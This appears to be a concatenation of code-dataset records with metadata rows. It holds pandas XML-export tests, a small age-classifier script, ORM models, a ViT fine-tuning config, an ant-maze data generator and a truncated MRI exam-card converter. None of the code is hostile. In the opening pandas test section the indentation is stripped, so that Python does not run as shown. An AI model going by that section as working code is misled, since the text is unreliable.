"triangle</shape><degrees>180</degrees><sides>3.0</sides>"
"</row></data>"
)
output = geom_df.to_xml(pretty_print=False, parser=parser)
output = equalize_decl(output)
# etree adds space for closed tags
if output is not None:
output = output.replace(" />", "/>")
assert output == expected
def test_no_pretty_print_no_decl(parser):
expected = (
"<data><row><index>0</index><shape>square</shape>"
"<degrees>360</degrees><sides>4.0</sides></row><row>"
"<index>1</index><shape>circle</shape><degrees>360"
"</degrees><sides/></row><row><index>2</index><shape>"
"triangle</shape><degrees>180</degrees><sides>3.0</sides>"
"</row></data>"
)
output = geom_df.to_xml(xml_declaration=False, pretty_print=False, parser=parser)
# etree adds space for closed tags
if output is not None:
output = output.replace(" />", "/>")
assert output == expected
# PARSER
@td.skip_if_installed("lxml")
def test_default_parser_no_lxml():
with pytest.raises(
ImportError, match=("lxml not found, please install or use the etree parser.")
):
geom_df.to_xml()
def test_unknown_parser():
with pytest.raises(
ValueError, match=("Values for parser can only be lxml or etree.")
):
geom_df.to_xml(parser="bs4")
# STYLESHEET
xsl_expected = """\
<?xml version="1.0" encoding="utf-8"?>
<data>
<row>
<field field="index">0</field>
<field field="shape">square</field>
<field field="degrees">360</field>
<field field="sides">4.0</field>
</row>
<row>
<field field="index">1</field>
<field field="shape">circle</field>
<field field="degrees">360</field>
<field field="sides"/>
</row>
<row>
<field field="index">2</field>
<field field="shape">triangle</field>
<field field="degrees">180</field>
<field field="sides">3.0</field>
</row>
</data>"""
@td.skip_if_no("lxml")
def test_stylesheet_file_like(datapath, mode):
xsl = datapath("io", "data", "xml", "row_field_output.xsl")
with open(xsl, mode) as f:
assert geom_df.to_xml(stylesheet=f) == xsl_expected
@td.skip_if_no("lxml")
def test_stylesheet_io(datapath, mode):
xsl_path = datapath("io", "data", "xml", "row_field_output.xsl")
xsl_obj: Union[BytesIO, StringIO]
with open(xsl_path, mode) as f:
if mode == "rb":
xsl_obj = BytesIO(f.read())
else:
xsl_obj = StringIO(f.read())
output = geom_df.to_xml(stylesheet=xsl_obj)
assert output == xsl_expected
@td.skip_if_no("lxml")
def test_stylesheet_buffered_reader(datapath, mode):
xsl = datapath("io", "data", "xml", "row_field_output.xsl")
with open(xsl, mode) as f:
xsl_obj = f.read()
output = geom_df.to_xml(stylesheet=xsl_obj)
assert output == xsl_expected
@td.skip_if_no("lxml")
def test_stylesheet_wrong_path(datapath):
from lxml.etree import XMLSyntaxError
xsl = os.path.join("data", "xml", "row_field_output.xslt")
with pytest.raises(
XMLSyntaxError,
match=("Start tag expected, '<' not found"),
):
geom_df.to_xml(stylesheet=xsl)
@td.skip_if_no("lxml")
@pytest.mark.parametrize("val", ["", b""])
def test_empty_string_stylesheet(val):
from lxml.etree import XMLSyntaxError
with pytest.raises(
XMLSyntaxError, match=("Document is empty|Start tag expected, '<' not found")
):
geom_df.to_xml(stylesheet=val)
@td.skip_if_no("lxml")
def test_incorrect_xsl_syntax():
from lxml.etree import XMLSyntaxError
xsl = """\
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" encoding="utf-8" indent="yes" >
<xsl:strip-space elements="*"/>
<xsl:template match="@*|node()">
<xsl:copy>
<xsl:apply-templates select="@*|node()"/>
</xsl:copy>
</xsl:template>
<xsl:template match="row/*">
<field>
<xsl:attribute name="field">
<xsl:value-of select="name()"/>
</xsl:attribute>
<xsl:value-of select="text()"/>
</field>
</xsl:template>
</xsl:stylesheet>"""
with pytest.raises(XMLSyntaxError, match=("Opening and ending tag mismatch")):
geom_df.to_xml(stylesheet=xsl)
@td.skip_if_no("lxml")
def test_incorrect_xsl_eval():
from lxml.etree import XSLTParseError
xsl = """\
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" encoding="utf-8" indent="yes" />
<xsl:strip-space elements="*"/>
<xsl:template match="@*|node(*)">
<xsl:copy>
<xsl:apply-templates select="@*|node()"/>
</xsl:copy>
</xsl:template>
<xsl:template match="row/*">
<field>
<xsl:attribute name="field">
<xsl:value-of select="name()"/>
</xsl:attribute>
<xsl:value-of select="text()"/>
</field>
</xsl:template>
</xsl:stylesheet>"""
with pytest.raises(XSLTParseError, match=("failed to compile")):
geom_df.to_xml(stylesheet=xsl)
@td.skip_if_no("lxml")
def test_incorrect_xsl_apply(parser):
from lxml.etree import XSLTApplyError
xsl = """\
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" encoding="utf-8" indent="yes" />
<xsl:strip-space elements="*"/>
<xsl:template match="@*|node()">
<xsl:copy>
<xsl:copy-of select="document('non_existent.xml')/*"/>
</xsl:copy>
</xsl:template>
</xsl:stylesheet>"""
with pytest.raises(XSLTApplyError, match=("Cannot resolve URI")):
with tm.ensure_clean("test.xml") as path:
geom_df.to_xml(path, stylesheet=xsl)
def test_stylesheet_with_etree(datapath):
xsl = """\
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" encoding="utf-8" indent="yes" />
<xsl:strip-space elements="*"/>
<xsl:template match="@*|node(*)">
<xsl:copy>
<xsl:apply-templates select="@*|node()"/>
</xsl:copy>
</xsl:template>"""
with pytest.raises(
ValueError, match=("To use stylesheet, you need lxml installed")
):
geom_df.to_xml(parser="etree", stylesheet=xsl)
@td.skip_if_no("lxml")
def test_style_to_csv():
xsl = """\
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text" indent="yes" />
<xsl:strip-space elements="*"/>
<xsl:param name="delim">,</xsl:param>
<xsl:template match="/data">
<xsl:text>,shape,degrees,sides
</xsl:text>
<xsl:apply-templates select="row"/>
</xsl:template>
<xsl:template match="row">
<xsl:value-of select="concat(index, $delim, shape, $delim,
degrees, $delim, sides)"/>
<xsl:text>
</xsl:text>
</xsl:template>
</xsl:stylesheet>"""
out_csv = geom_df.to_csv(line_terminator="\n")
if out_csv is not None:
out_csv = out_csv.strip()
out_xml = geom_df.to_xml(stylesheet=xsl)
assert out_csv == out_xml
@td.skip_if_no("lxml")
def test_style_to_string():
xsl = """\
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text" indent="yes" />
<xsl:strip-space elements="*"/>
<xsl:param name="delim"><xsl:text> </xsl:text></xsl:param>
<xsl:template match="/data">
<xsl:text> shape degrees sides
</xsl:text>
<xsl:apply-templates select="row"/>
</xsl:template>
<xsl:template match="row">
<xsl:value-of select="concat(index, ' ',
substring($delim, 1, string-length('triangle')
- string-length(shape) + 1),
shape,
substring($delim, 1, string-length(name(degrees))
- string-length(degrees) + 2),
degrees,
substring($delim, 1, string-length(name(sides))
- string-length(sides) + 2),
sides)"/>
<xsl:text>
</xsl:text>
</xsl:template>
</xsl:stylesheet>"""
out_str = geom_df.to_string()
out_xml = geom_df.to_xml(na_rep="NaN", stylesheet=xsl)
assert out_xml == out_str
@td.skip_if_no("lxml")
def test_style_to_json():
xsl = """\
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text" indent="yes" />
<xsl:strip-space elements="*"/>
<xsl:param name="quot">"</xsl:param>
<xsl:template match="/data">
<xsl:text>{"shape":{</xsl:text>
<xsl:apply-templates select="descendant::row/shape"/>
<xsl:text>},"degrees":{</xsl:text>
<xsl:apply-templates select="descendant::row/degrees"/>
<xsl:text>},"sides":{</xsl:text>
<xsl:apply-templates select="descendant::row/sides"/>
<xsl:text>}}</xsl:text>
</xsl:template>
<xsl:template match="shape|degrees|sides">
<xsl:variable name="val">
<xsl:if test = ".=''">
<xsl:value-of select="'null'"/>
</xsl:if>
<xsl:if test = "number(text()) = text()">
<xsl:value-of select="text()"/>
</xsl:if>
<xsl:if test = "number(text()) != text()">
<xsl:value-of select="concat($quot, text(), $quot)"/>
</xsl:if>
</xsl:variable>
<xsl:value-of select="concat($quot, preceding-sibling::index,
$quot,':', $val)"/>
<xsl:if test="preceding-sibling::index != //row[last()]/index">
<xsl:text>,</xsl:text>
</xsl:if>
</xsl:template>
</xsl:stylesheet>"""
out_json = geom_df.to_json()
out_xml = geom_df.to_xml(stylesheet=xsl)
assert out_json == out_xml
# COMPRESSION
geom_xml = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row>
<index>0</index>
<shape>square</shape>
<degrees>360</degrees>
<sides>4.0</sides>
</row>
<row>
<index>1</index>
<shape>circle</shape>
<degrees>360</degrees>
<sides/>
</row>
<row>
<index>2</index>
<shape>triangle</shape>
<degrees>180</degrees>
<sides>3.0</sides>
</row>
</data>"""
@pytest.mark.parametrize("comp", ["bz2", "gzip", "xz", "zip"])
def test_compression_output(parser, comp):
with tm.ensure_clean() as path:
geom_df.to_xml(path, parser=parser, compression=comp)
with get_handle(
path,
"r",
compression=comp,
) as handle_obj:
output = handle_obj.handle.read()
output = equalize_decl(output)
assert geom_xml == output.strip()
@pytest.mark.parametrize("comp", ["bz2", "gzip", "xz", "zip"])
@pytest.mark.parametrize("compfile", ["xml.bz2", "xml.gz", "xml.xz", "xml.zip"])
def test_filename_and_suffix_comp(parser, comp, compfile):
with tm.ensure_clean(filename=compfile) as path:
geom_df.to_xml(path, parser=parser, compression=comp)
with get_handle(
path,
"r",
compression=comp,
) as handle_obj:
output = handle_obj.handle.read()
output = equalize_decl(output)
assert geom_xml == output.strip()
def test_unsupported_compression(datapath, parser):
with pytest.raises(ValueError, match="Unrecognized compression type"):
with tm.ensure_clean() as path:
geom_df.to_xml(path, parser=parser, compression="7z")
# STORAGE OPTIONS
@tm.network
@td.skip_if_no("s3fs")
@td.skip_if_no("lxml")
def test_s3_permission_output(parser):
import s3fs
with pytest.raises(PermissionError, match="Access Denied"):
fs = s3fs.S3FileSystem(anon=True)
fs.ls("pandas-test")
geom_df.to_xml("s3://pandas-test/geom.xml", compression="zip", parser=parser)
| 25.828725
| 88
| 0.601832
|
8311647048cfbeb58c4691a1cfe57b5bf517df7e
| 383
|
py
|
Python
|
pythonteste/desafio41.py
|
dangiotto/Python
|
29a9d18d7595a5c21e65dafc39f7fd4c55d8971c
|
[
"MIT"
] | 1
|
2020-10-17T03:23:59.000Z
|
2020-10-17T03:23:59.000Z
|
pythonteste/desafio41.py
|
dangiotto/Python
|
29a9d18d7595a5c21e65dafc39f7fd4c55d8971c
|
[
"MIT"
] | null | null | null |
pythonteste/desafio41.py
|
dangiotto/Python
|
29a9d18d7595a5c21e65dafc39f7fd4c55d8971c
|
[
"MIT"
] | null | null | null |
i = int(input('Enter your age: '))
if i<=9:
    print('Age {} - Up to 9 years old: MIRIM'.format(i))
elif i>9 and i<=14:
    print('Age {} - Up to 14 years old: INFANTIL'.format(i))
elif i>14 and i<=19:
    print('Age {} - Up to 19 years old: JUNIOR'.format(i))
elif i>19 and i<=20:
    print('Age {} - Up to 20 years old: SÊNIOR'.format(i))
else:
    print('Age {} - Older than 20: MASTER'.format(i))
| 34.818182
| 55
| 0.590078
|
7f3a717a56ec983c93fd4d190a83beaf7a2c5029
| 3,845
|
py
|
Python
|
models/artist.py
|
wanderindev/fyyur
|
acf3a44ce7fae6b24576a320afd447c0595d76e5
|
[
"MIT"
] | null | null | null |
models/artist.py
|
wanderindev/fyyur
|
acf3a44ce7fae6b24576a320afd447c0595d76e5
|
[
"MIT"
] | null | null | null |
models/artist.py
|
wanderindev/fyyur
|
acf3a44ce7fae6b24576a320afd447c0595d76e5
|
[
"MIT"
] | 2
|
2020-07-16T22:02:13.000Z
|
2020-11-22T21:16:28.000Z
|
from datetime import datetime
from sqlalchemy import desc, exc
from app import db
from constants import GENRE_CHECK
from .mixin import ModelMixin
from .show import Show
class Artist(db.Model, ModelMixin):
__tablename__ = "artists"
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String, nullable=False)
city = db.Column(db.String(120), nullable=False)
state = db.Column(db.String(120), nullable=False)
phone = db.Column(db.String(120))
genres = db.Column(db.ARRAY(db.String(30)), nullable=False)
image_link = db.Column(db.String(500))
facebook_link = db.Column(db.String(120))
website = db.Column(db.String(500))
seeking_venue = db.Column(db.Boolean, default=True)
seeking_description = db.Column(db.String(500))
date_created = db.Column(
db.DateTime, nullable=False, default=datetime.utcnow
)
shows = db.relationship(
"Show", backref="artist", lazy=True, cascade="delete"
)
def __init__(self, **kwargs):
super(Artist, self).__init__(**kwargs)
check_genres = all(genre in GENRE_CHECK for genre in self.genres)
if not check_genres:
raise exc.ProgrammingError(
"Invalid genre",
{"Genres passed": self.genres},
{"Genres allowed": GENRE_CHECK},
)
@classmethod
def past_shows(cls, _id):
return Show.past_shows_by_artist(_id)
@classmethod
def past_shows_count(cls, _id):
return len(cls.past_shows(_id))
@classmethod
def upcoming_shows(cls, _id):
return Show.upcoming_shows_by_artist(_id)
@classmethod
def upcoming_shows_count(cls, _id):
return len(cls.upcoming_shows(_id))
@classmethod
def get_by_id(cls, _id):
return cls.query.filter_by(id=_id).first()
@classmethod
def get_artists(cls):
return [
{"id": artist.id, "name": artist.name,}
for artist in cls.query.all()
]
@classmethod
def search(cls, search_term):
artists = cls.query.filter(cls.name.ilike(f"%{search_term}%")).all()
return {
"data": [
{
"id": artist.id,
"name": artist.name,
"num_upcoming_shows": cls.upcoming_shows_count(artist.id),
}
for artist in artists
],
"count": len(artists),
}
@classmethod
def get_artist(cls, _id):
_obj = {
"past_shows": cls.past_shows(_id),
"past_shows_count": cls.past_shows_count(_id),
"upcoming_shows": cls.upcoming_shows(_id),
"upcoming_shows_count": cls.upcoming_shows_count(_id),
}
artist = cls.get_by_id(_id)
if not artist:
return None
return cls.to_dict(artist, _obj)
@classmethod
def update(cls, _id, data):
artist = cls.get_by_id(_id)
artist.name = data.get("name", "")
artist.city = data.get("city", "")
artist.state = data.get("state", "")
artist.phone = data.get("phone", "")
artist.genres = data.get("genres", [])
artist.image_link = data.get("image_link", "")
artist.facebook_link = data.get("facebook_link", "")
artist.website = data.get("website", "")
artist.seeking_venue = data.get("seeking_venue", False)
artist.seeking_description = data.get("seeking_description", "")
return artist.save_to_db()
@classmethod
def get_recent(cls):
artists = cls.query.order_by(desc(cls.date_created)).limit(10).all()
return [{"id": artist.id, "name": artist.name,} for artist in artists]
| 33.434783
| 79
| 0.583355
|
1dccaaf07d65ae0b66c9f791eb1d6d2ce5d8cbd0
| 4,132
|
py
|
Python
|
baselines/jft/experiments/jft300m_vit_base16_sngp_finetune_cifar100.py
|
sorennelson/uncertainty-baselines
|
2d8102d1df6f413e85becb0d37b468acbf8730e7
|
[
"Apache-2.0"
] | 794
|
2020-07-17T06:23:58.000Z
|
2022-03-31T08:31:53.000Z
|
baselines/jft/experiments/jft300m_vit_base16_sngp_finetune_cifar100.py
|
piotr-teterwak/uncertainty-baselines
|
8eba807c5224279c582b9d6b86035e6f8a3783a9
|
[
"Apache-2.0"
] | 136
|
2020-08-04T22:42:04.000Z
|
2022-03-26T21:07:03.000Z
|
baselines/jft/experiments/jft300m_vit_base16_sngp_finetune_cifar100.py
|
piotr-teterwak/uncertainty-baselines
|
8eba807c5224279c582b9d6b86035e6f8a3783a9
|
[
"Apache-2.0"
] | 129
|
2020-08-16T12:46:55.000Z
|
2022-03-31T23:00:10.000Z
|
# coding=utf-8
# Copyright 2021 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=line-too-long
r"""ViT-SNGP-B/16 finetuning on CIFAR.
"""
# pylint: enable=line-too-long
import ml_collections
def get_config():
"""Config for training a patch-transformer on JFT."""
config = ml_collections.ConfigDict()
# Fine-tuning dataset
config.dataset = 'cifar100'
config.val_split = 'train[98%:]'
config.train_split = 'train[:98%]'
config.num_classes = 100
# OOD evaluation dataset
config.ood_datasets = ['cifar10', 'svhn_cropped']
config.ood_split = 'test'
config.ood_methods = ['msp', 'maha', 'rmaha']
BATCH_SIZE = 512 # pylint: disable=invalid-name
config.batch_size = BATCH_SIZE
config.total_steps = 10_000
INPUT_RES = 384 # pylint: disable=invalid-name
pp_common = '|value_range(-1, 1)'
# pp_common += f'|onehot({config.num_classes})'
# To use ancestor 'smearing', use this line instead:
pp_common += f'|onehot({config.num_classes}, key="label", key_result="labels")' # pylint: disable=line-too-long
pp_common += '|keep(["image", "labels"])'
config.pp_train = f'decode|inception_crop({INPUT_RES})|flip_lr' + pp_common
config.pp_eval = f'decode|resize({INPUT_RES})' + pp_common
config.shuffle_buffer_size = 50_000 # Per host, so small-ish is ok.
config.log_training_steps = 10
config.log_eval_steps = 100
# NOTE: eval is very fast O(seconds) so it's fine to run it often.
config.checkpoint_steps = 1000
config.checkpoint_timeout = 1
config.prefetch_to_device = 2
config.trial = 0
# Model section
# pre-trained model ckpt file
# !!! The below section should be modified per experiment
config.model_init = '/path/to/pretrained_model_ckpt.npz'
# Model definition to be copied from the pre-training config
config.model = ml_collections.ConfigDict()
config.model.patches = ml_collections.ConfigDict()
config.model.patches.size = [16, 16]
config.model.hidden_size = 768
config.model.transformer = ml_collections.ConfigDict()
config.model.transformer.attention_dropout_rate = 0.
config.model.transformer.dropout_rate = 0.
config.model.transformer.mlp_dim = 3072
config.model.transformer.num_heads = 12
config.model.transformer.num_layers = 12
config.model.classifier = 'token' # Or 'gap'
# Re-initialize the trainable parameters in GP output layer (Also those in the
# dense output layer if loading from deterministic checkpoint).
config.model_reinit_params = ('head/output_layer/kernel',
'head/output_layer/bias', 'head/kernel',
'head/bias')
# This is "no head" fine-tuning, which we use by default
config.model.representation_size = None
# Gaussian process layer section
config.gp_layer = ml_collections.ConfigDict()
config.gp_layer.ridge_penalty = 1.
# Disable momentum in order to use exact covariance update for finetuning.
config.gp_layer.covmat_momentum = -1.
config.gp_layer.mean_field_factor = 20.
# Optimizer section
config.optim_name = 'Momentum'
config.optim = ml_collections.ConfigDict()
config.grad_clip_norm = -1.
config.weight_decay = None # No explicit weight decay
config.loss = 'softmax_xent' # or 'sigmoid_xent'
config.lr = ml_collections.ConfigDict()
# Best lr.base depends on what pretrained ViT model is used.
# (e.g., for deterministic ViT pretrained model, lr.base=0.0007;
# for ViT-GP pretrained model, lr.base=0.0003)
config.lr.base = 0.0003
config.lr.warmup_steps = 500
config.lr.decay_type = 'cosine'
config.args = {}
return config
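# Editor's sketch (not part of the original config): downstream trainers call
# get_config() and may override fields before use; the lr value below is just the
# deterministic-ViT example already suggested in the comments above.
if __name__ == '__main__':
  config = get_config()
  config.lr.base = 0.0007  # e.g. when finetuning from a deterministic ViT checkpoint
  print(config.dataset, config.total_steps, config.gp_layer.mean_field_factor)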
| 35.316239
| 114
| 0.723136
|
dc30811ed621815d0fb75df95b4176a7970c898b
| 124
|
py
|
Python
|
blog/admin.py
|
arpitansu/src
|
a5221fdd1ab9bb3b51be6a7ed338a0886fdc68e8
|
[
"MIT"
] | null | null | null |
blog/admin.py
|
arpitansu/src
|
a5221fdd1ab9bb3b51be6a7ed338a0886fdc68e8
|
[
"MIT"
] | 2
|
2021-03-30T14:15:31.000Z
|
2021-04-08T21:55:29.000Z
|
blog/admin.py
|
arpitansu/src
|
a5221fdd1ab9bb3b51be6a7ed338a0886fdc68e8
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import BlogPost
# Register your models here.
admin.site.register(BlogPost)
| 15.5
| 32
| 0.798387
|
c5afde903c994c1ca57f1fa41db2b2eb96c27dd5
| 387
|
py
|
Python
|
blockchain/database/db.py
|
Adasumizox/crypto
|
45cb3cd19007a1b319efea20137a04a83afcf975
|
[
"MIT"
] | null | null | null |
blockchain/database/db.py
|
Adasumizox/crypto
|
45cb3cd19007a1b319efea20137a04a83afcf975
|
[
"MIT"
] | null | null | null |
blockchain/database/db.py
|
Adasumizox/crypto
|
45cb3cd19007a1b319efea20137a04a83afcf975
|
[
"MIT"
] | null | null | null |
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
SQLALCHEMY_DATABASE_URL = 'sqlite:///./blockchain.db'
engine = create_engine(
SQLALCHEMY_DATABASE_URL, connect_args={"check_same_thread": False}
)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()
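# Editor's sketch (not part of the original module): one common way SessionLocal is
# consumed, e.g. as a request-scoped dependency; the name `get_db` is illustrative.
def get_db():
    """Yield a database session and make sure it is closed afterwards."""
    db = SessionLocal()
    try:
        yield db
    finally:
        db.close()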
| 32.25
| 74
| 0.819121
|
7e4cc7754dcbfda2b4bf225a993ac123ae4cf04d
| 5,446
|
py
|
Python
|
scripts/generate_ant_maze_datasets.py
|
Thibaud-Ardoin/d4rl
|
631cdcbf93441384dcf96df39a70c287749ab2ad
|
[
"Apache-2.0"
] | null | null | null |
scripts/generate_ant_maze_datasets.py
|
Thibaud-Ardoin/d4rl
|
631cdcbf93441384dcf96df39a70c287749ab2ad
|
[
"Apache-2.0"
] | null | null | null |
scripts/generate_ant_maze_datasets.py
|
Thibaud-Ardoin/d4rl
|
631cdcbf93441384dcf96df39a70c287749ab2ad
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import pickle
import gzip
import h5py
import argparse
from offline_rl.locomotion import maze_env, ant, swimmer
from offline_rl.locomotion.wrappers import NormalizedBoxEnv
import torch
from PIL import Image
import os
def reset_data():
return {'observations': [],
'actions': [],
'terminals': [],
'rewards': [],
'infos/goal': [],
'infos/qpos': [],
'infos/qvel': [],
}
def append_data(data, s, a, r, tgt, done, env_data):
data['observations'].append(s)
data['actions'].append(a)
data['rewards'].append(r)
data['terminals'].append(done)
data['infos/goal'].append(tgt)
data['infos/qpos'].append(env_data.qpos.ravel().copy())
data['infos/qvel'].append(env_data.qvel.ravel().copy())
def npify(data):
for k in data:
if k == 'terminals':
dtype = np.bool_
else:
dtype = np.float32
data[k] = np.array(data[k], dtype=dtype)
def load_policy(policy_file):
data = torch.load(policy_file)
policy = data['exploration/policy']
env = data['evaluation/env']
print("Policy loaded")
return policy, env
def save_video(save_dir, file_name, frames, episode_id=0):
filename = os.path.join(save_dir, file_name+ '_episode_{}'.format(episode_id))
if not os.path.exists(filename):
os.makedirs(filename)
num_frames = frames.shape[0]
for i in range(num_frames):
img = Image.fromarray(np.flipud(frames[i]), 'RGB')
img.save(os.path.join(filename, 'frame_{}.png'.format(i)))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--noisy', action='store_true', help='Noisy actions')
parser.add_argument('--maze', type=str, default='u-maze', help='Maze type. small or default')
parser.add_argument('--num_samples', type=int, default=int(1e5), help='Num samples to collect')
parser.add_argument('--env', type=str, default='Ant', help='Environment type')
parser.add_argument('--policy_file', type=str, default='policy_file', help='file_name')
parser.add_argument('--max_episode_steps', default=1000, type=int)
parser.add_argument('--video', action='store_true')
parser.add_argument('--multi_start', action='store_true')
parser.add_argument('--multigoal', action='store_true')
args = parser.parse_args()
if args.maze == 'u-maze':
maze = maze_env.U_MAZE
elif args.maze == 'big-maze':
maze = maze_env.BIG_MAZE
elif args.maze == 'hardest-maze':
maze = maze_env.HARDEST_MAZE
else:
raise NotImplementedError
    # import ipdb; ipdb.set_trace()
if args.env == 'Ant':
env = NormalizedBoxEnv(ant.AntMazeEnv(maze_map=maze, maze_size_scaling=4.0, non_zero_reset=args.multi_start))
elif args.env == 'Swimmer':
        env = NormalizedBoxEnv(swimmer.SwimmerMazeEnv(maze_map=maze, maze_size_scaling=4.0, non_zero_reset=args.multi_start))
else:
raise NotImplementedError
env.set_target()
s = env.reset()
act = env.action_space.sample()
done = False
# Load the policy
policy, train_env = load_policy(args.policy_file)
# Define goal reaching policy fn
def _goal_reaching_policy_fn(obs, goal):
goal_x, goal_y = goal
obs_new = obs[2:-2]
goal_tuple = np.array([goal_x, goal_y])
# normalize the norm of the relative goals to in-distribution values
goal_tuple = goal_tuple / np.linalg.norm(goal_tuple) * 10.0
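        # e.g. a relative goal of (3, 4) (norm 5) is rescaled to (6, 8), i.e. norm 10,
        # matching the goal magnitudes the policy saw in training (editor's illustration)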
new_obs = np.concatenate([obs_new, goal_tuple], -1)
return policy.get_action(new_obs)[0], (goal_tuple[0] + obs[0], goal_tuple[1] + obs[1])
data = reset_data()
# create waypoint generating policy integrated with high level controller
data_collection_policy = env.create_navigation_policy(
_goal_reaching_policy_fn,
)
if args.video:
frames = []
ts = 0
num_episodes = 0
for _ in range(args.num_samples):
act, waypoint_goal = data_collection_policy(s)
if args.noisy:
act = act + np.random.randn(*act.shape)*0.2
act = np.clip(act, -1.0, 1.0)
ns, r, done, info = env.step(act)
if ts >= args.max_episode_steps:
done = True
append_data(data, s[:-2], act, r, env.target_goal, done, env.physics.data)
if len(data['observations']) % 10000 == 0:
print(len(data['observations']))
ts += 1
if done:
done = False
ts = 0
s = env.reset()
env.set_target_goal()
if args.video:
frames = np.array(frames)
save_video('./videos/', args.env + '_navigation', frames, num_episodes)
num_episodes += 1
frames = []
else:
s = ns
if args.video:
curr_frame = env.physics.render(width=500, height=500, depth=False)
frames.append(curr_frame)
if args.noisy:
fname = args.env + '_maze_%s_noisy_multistart_%s_multigoal_%s.hdf5' % (args.maze, str(args.multi_start), str(args.multigoal))
else:
        fname = args.env + '_maze_%s_multistart_%s_multigoal_%s.hdf5' % (args.maze, str(args.multi_start), str(args.multigoal))
dataset = h5py.File(fname, 'w')
npify(data)
for k in data:
dataset.create_dataset(k, data=data[k], compression='gzip')
if __name__ == '__main__':
main()
| 32.807229
| 133
| 0.624311
|
f2657fb6ee0626dd9bf41c6d21da48be0370016e
| 8,057
|
py
|
Python
|
xnatwrapper/examcard2json.py
|
lawlessrd/aslprep
|
22ec61f482cc3561f4fd35d769af0fe8bc2e80cb
|
[
"BSD-3-Clause"
] | null | null | null |
xnatwrapper/examcard2json.py
|
lawlessrd/aslprep
|
22ec61f482cc3561f4fd35d769af0fe8bc2e80cb
|
[
"BSD-3-Clause"
] | null | null | null |
xnatwrapper/examcard2json.py
|
lawlessrd/aslprep
|
22ec61f482cc3561f4fd35d769af0fe8bc2e80cb
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python
'''
Inputs:
-i: Filename of text file containing Exam Card info
-s: List of asl scan names to search in exam card
-b: BIDS file structure containing nifti files and json sidecars
Outputs:
updated json sidecar for ASL images in Exam Card
Name: sub-01_ses-01_asl.json OR sub-01_ses-01_m0scan.json
Required inputs for json sidecar
ASL general metadata fields:
MagneticFieldStrength
MRAcquisitionType (2D or 3D)
EchoTime
        If MRAcquisitionType is defined as 2D:
SliceTiming
If LookLocker is True:
RepetitionTimePreparation
FlipAngle
ArterialSpinLabelingType (CASL, PCASL, PASL)
PostLabelingDelay (in seconds) (0 for m0scans)
BackgroundSuppression
M0Type
TotalAcquiredPairs
(P)CASL specific metadata fields:
LabelingDuration (0 for m0scans)
PASL specific metadata fields:
BolusCutOffFlag (boolean)
If BolusCutOffFlag is True:
BolusCutOffDelayTime
BolusCutOffTechnique
m0scan metadata fields:
EchoTime
RepetitionTimePreparation
If LookLocker is True:
FlipAngle
IntendedFor (string with associated ASL image filename)
Units of time should always be seconds.
'''
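# Editor's illustration (hypothetical values, not emitted verbatim by this script):
# a minimal (P)CASL sidecar assembled from the fields above might look like
# {
#     "ArterialSpinLabelingType": "PCASL",
#     "PostLabelingDelay": 1.8,
#     "LabelingDuration": 1.65,
#     "BackgroundSuppression": true,
#     "M0Type": "Separate",
#     "RepetitionTimePreparation": 0,
#     "SliceTiming": [0.0, 0.06, 0.12]
# }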
### To do:
# load in json with scan names instead of using inputs
# make sure script can find examcard
from __future__ import print_function
import json
import re
import sys, getopt
import glob
import numpy as np
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
return json.JSONEncoder.default(self, obj)
def search_string_in_file(file_name, string_to_search, starting_line):
"""
Search for given string in file starting at provided line number
and return the first line containing that string,
along with line numbers.
:param file_name: name of text file to scrub
:param string_to_search: string of text to search for in file
:param starting_line: line at which search starts
"""
line_number = 0
list_of_results = []
# Open file in read only mode
with open(file_name, 'r') as read_obj:
# Read all lines one by one
for line in read_obj:
line_number += 1
if line_number < starting_line:
continue
else:
line = line.rstrip()
if re.search(r"{}".format(string_to_search),line):
# If yes add the line number & line as a tuple in the list
list_of_results.append((line_number,line.rstrip()))
#Return list of tuples containing line numbers and lines where string is found
return list_of_results
def modify_json(json_file, s_dict):
"""
Add contents of s_dict to .json file
:param json_file: name of json file
:param s_dict: dictionary of info to add to .json file
"""
if json_file:
        with open(json_file, 'r') as f:
            json_contents = json.load(f)
            json_contents.update(s_dict)
        with open(json_file, 'w') as f:
            json.dump(json_contents, f, indent=4, cls=NumpyEncoder)
print('Added exam card information to',json_file)
else:
print('Files not found or data is not in BIDS format. Please repeat with correct file/structure.')
sys.exit()
def main(argv):
indir = ''
scannames = ''
bids = ''
inputfile= ''
try:
opts, args = getopt.getopt(argv, "hi:b:e:",["input=","bids=","examcard="])
except getopt.GetoptError:
print('examcard2json.py -i <indir> -b <folder> -e <examcard.txt>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('examcard2json.py -i <indir> -b <folder> -e <examcard.txt>')
sys.exit()
elif opt in ("-i", "--input"):
indir = arg
elif opt in ("-b", "--bids"):
bids = arg
elif opt in ("-e","--examcard"):
inputfile = arg
#Initialize dictionaries
scan_dict = {}
#Get scans from SeriesDescription.json
